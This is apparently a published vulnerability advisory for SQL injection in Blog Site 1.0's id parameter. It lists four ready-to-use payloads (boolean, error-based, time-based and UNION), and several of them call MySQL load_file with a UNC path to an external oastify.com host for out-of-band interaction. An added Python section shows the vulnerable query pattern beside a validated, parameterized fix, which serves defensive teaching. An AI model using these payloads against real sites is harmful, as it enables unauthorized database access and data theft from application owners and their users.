Blog Site 1.0 SQL Injection
Blog Site version 1.0 suffers from a remote SQL injection vulnerability.
## Titles: blog-site-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 07/29/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14442/blog-site-using-phpmysql.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: page=category&id=-7721' OR 5223=5223 AND 'yTLh'='yTLh

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=category&id=3'+(select load_file('\\\\turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT 2233 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(2233=2233,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mgsn'='Mgsn

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=category&id=3'+(select load_file('\\\\turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT 5859 FROM (SELECT(SLEEP(7)))tvNV) AND 'ocCx'='ocCx

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: page=category&id=3'+(select load_file('\\\\turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' UNION ALL SELECT CONCAT(0x7171717671,0x416d7442627944704b55554267774f596d766967615341654a4242745a45467a71494f73596f776b,0x716b626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
```

## Reproduce:
[href](https://www.patreon.com/posts/blog-site-1-0-108994688)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/07/blog-site-10-multiple-sqli.html)

## Time spent: 00:37:00
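
## Added example: why the id parameter is injectable, and the fix
The following is an added example, not code from the advisory or from the Blog Site project. It shows the query pattern that the boolean-based payload above implies, next to a validated and parameterized version. The application's real query is not shown on the page, so the `posts` table, its columns and the function names are assumptions, and an in-memory SQLite database stands in for MySQL.

```python
import sqlite3

def make_db():
    # Constructed sample data; the real application's schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, category_id INTEGER, title TEXT)")
    db.executemany(
        "INSERT INTO posts (category_id, title) VALUES (?, ?)",
        [(3, "Post in category 3"), (3, "Another in category 3"), (5, "Post in category 5")],
    )
    return db

def posts_vulnerable(db, raw_id):
    # Assumed 'before' pattern: the request value is pasted into the SQL text,
    # so a quote in raw_id ends the literal and the rest is parsed as SQL.
    sql = "SELECT title FROM posts WHERE category_id = '" + raw_id + "'"
    return [row[0] for row in db.execute(sql)]

def parse_id(raw_id):
    # Allow-list check: id must consist of ASCII decimal digits only.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    return int(raw_id)

def posts_hardened(db, raw_id):
    # Validate first, then bind the value as a parameter so it is never parsed as SQL.
    sql = "SELECT title FROM posts WHERE category_id = ?"
    return [row[0] for row in db.execute(sql, (parse_id(raw_id),))]

# Boolean-based payload quoted in the advisory (value of the id parameter).
PAYLOAD = "-7721' OR 5223=5223 AND 'yTLh'='yTLh"

if __name__ == "__main__":
    db = make_db()
    print(posts_vulnerable(db, "3"))      # rows for category 3 only
    print(posts_vulnerable(db, PAYLOAD))  # every row: the OR clause is always true
    print(posts_hardened(db, "3"))        # same rows as the normal request
    try:
        posts_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

In the PHP/MySQL application the equivalent change is an integer check on `id` followed by a prepared statement with a bound parameter.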